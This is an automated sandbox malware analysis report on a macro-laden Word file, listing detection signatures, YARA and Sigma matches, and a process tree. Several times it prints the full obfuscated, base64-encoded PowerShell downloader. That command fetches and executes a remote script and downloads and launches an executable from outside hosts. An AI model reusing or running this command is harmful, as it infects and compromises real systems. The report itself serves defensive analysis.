Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report attacker1.doc

Overview

General Information

Sample Name:attacker1.doc
Analysis ID:520834
MD5:4443840f2870c2cd55062bdcab07e5fd
SHA1:61911e604362338b0f9c91c4aa69696a88dad62f
SHA256:2979b5fbb454e2f13d89e58177f8c1f881bd3f0a0bebb1d27da9e189ba9d284e
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Microsoft Office Product Spawning Windows Shell
Encrypted powershell cmdline option found
Very long command line found
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Obfuscated command line found
Yara detected Obfuscated Powershell
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1532 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 668 cmdline: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2984 cmdline: POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
attacker1.docSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0xacd7:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xacd7:$r2: P^O^W^E^R^S^H^E^L^L
attacker1.docOffice_AutoOpen_MacroDetects an Microsoft Office file that contains the AutoOpen Macro functionFlorian Roth
  • 0x11f8f:$s1: AutoOpen
  • 0x13c7c:$s1: AutoOpen
  • 0xf500:$s2: Macros
attacker1.docJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
    • 0xc1c8:$s1: \Common Files\Microsoft Shared\
    • 0x37b1:$s2: Scripting.FileSystemObject
    • 0x3cd8:$a3: AutoOpen
    • 0xc6b6:$a3: AutoOpen
    • 0xc91b:$a3: AutoOpen
    • 0xed63:$a3: AutoOpen

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.408319422.000000000029F000.00000004.00000020.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x5b42:$r1: P^O^W^E^R^S^H^E^L^L
    • 0x5b42:$r2: P^O^W^E^R^S^H^E^L^L
    00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x1f9f:$r1: P^O^W^E^R^S^H^E^L^L
    • 0x1f9f:$r2: P^O^W^E^R^S^H^E^L^L
    00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmpJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security
      00000002.00000002.408293787.0000000000260000.00000004.00000020.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
      • 0x25de:$r1: P^O^W^E^R^S^H^E^L^L
      • 0x4307:$r1: P^O^W^E^R^S^H^E^L^L
      • 0x25de:$r2: P^O^W^E^R^S^H^E^L^L
      • 0x4307:$r2: P^O^W^E^R^S^H^E^L^L
      Process Memory Space: cmd.exe PID: 668SUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
      • 0x2e8e:$r1: P^O^W^E^R^S^H^E^L^L
      • 0xc56e:$r1: P^O^W^E^R^S^H^E^L^L
      • 0xdd4b:$r1: P^O^W^E^R^S^H^E^L^L
      • 0xe8c7:$r1: P^O^W^E^R^S^H^E^L^L
      • 0xf325:$r1: P^O^W^E^R^S^H^E^L^L
      • 0x2e8e:$r2: P^O^W^E^R^S^H^E^L^L
      • 0xc56e:$r2: P^O^W^E^R^S^H^E^L^L
      • 0xdd4b:$r2: P^O^W^E^R^S^H^E^L^L
      • 0xe8c7:$r2: P^O^W^E^R^S^H^E^L^L
      • 0xf325:$r2: P^O^W^E^R^S^H^E^L^L

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
      Source: Process startedAuthor: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=, CommandLine: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAg
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=, CommandLine: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAg
      Sigma detected: Non Interactive PowerShellShow sources
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgA